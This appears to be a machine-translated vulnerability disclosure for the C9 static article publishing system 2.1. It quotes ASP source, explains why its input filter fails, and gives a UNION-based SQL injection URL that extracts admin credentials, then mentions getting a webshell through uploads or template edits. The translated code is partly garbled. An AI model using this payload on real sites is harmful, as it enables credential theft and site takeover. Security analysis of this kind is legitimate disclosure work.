C9 static article publishing system official version 2.1 Vulnerability

By: Jshell
Recently, I am studying asp to down.chinaz.com to read the source code.
I 've been seeing a program named C9 static article publishing system, but I haven't read it carefully.
Today, I downloaded a copy and read it. I found the problem. In voting, there is a flash voting system.
Flash I don't understand, so I caught a packet and read it. I found that I submitted the voting xml. asp through add. asp.
Provides rss output. When I read this article, I found a problem.
The Code is as follows:

<! -- # Include file = "../conn. asp" -->
<! -- # Include file = "../fun/funlogic. asp" -->
<%
Thisid = funstr (Trim (Request. QueryString ("voteid ")))
If thisid = "" then
Set rs1_conn.exe cute ("select top 1 * from plug_vote where oorc <> false order by id desc ")
Else
Set rs1_conn.exe cute ("select * from plug_vote where id =" & thisid)
End if
If rs. eof then response. Write ("connection data error"): response. End ()
Conn.exe cute "update plug_vote set votevi = votevi + 1 where id =" & rs ("id ")
For I = 1 to 5
If isnull (rs ("cs _" & I) then exit
Next
Nowid = rs ("id ")
......
%>
 
Here we will look at how to receive the value passed in by the variable.
Thisid = funstr (Trim (Request. queryString ("voteid") trim filters spaces on both sides and then funstr. This function contains fun/funlogic in the contained file. asp function should open this file here

Function funstr (str)

Str = replace (str, "<", "& lt;", 1,-1, 1)
Str = replace (str, ">", "& gt;", 1,-1, 1)
Str = trim (str)
Str = replace (str ,"","'")

Funstr = str
End Function
Function unfunstr (str)

Str = replace (str, "& lt;", "<", 1,-1, 1)
Str = replace (str, "& gt;", ">", 1,-1, 1)
Str = trim (str)
Str = replace (str ,"'","")

Unfunstr = str
End Function
 
This function is used to filter some characters in a string, such as <> spaces, etc. The author may think that this function can achieve the effect of anti-injection. In fact, it is not necessary for injection.
Http: // 127.0.0.1: 2936/plug_vote/xml. asp? Voteid = 1

Construct http: // 127.0.0.1: 2936/plug_vote/xml. asp? Voteid = 1% 20and % 201 = 2% 20 union % 20 select %, 7, username, password, 18% 20 from % 20 user % 20 where % 20id = 1 query to obtain the administrator username and password

:

There are two ways to use webshell in the background: Upload and edit templates.
You can edit the template address, but not to mention MJJ, the victim of this vulnerability.